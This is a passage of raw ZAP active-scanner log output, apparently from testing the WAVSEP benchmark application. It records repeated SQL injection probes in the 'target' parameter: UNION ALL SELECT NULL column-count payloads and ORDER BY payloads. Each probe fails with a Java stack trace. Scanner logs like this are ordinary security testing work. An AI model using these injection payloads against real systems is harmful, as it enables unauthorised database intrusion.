org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922679 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922681 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922682 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922684 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922685 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922686 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922687 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922689 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922691 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922692 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922694 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922696 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 4472#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' ORDER BY 4472# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL# at 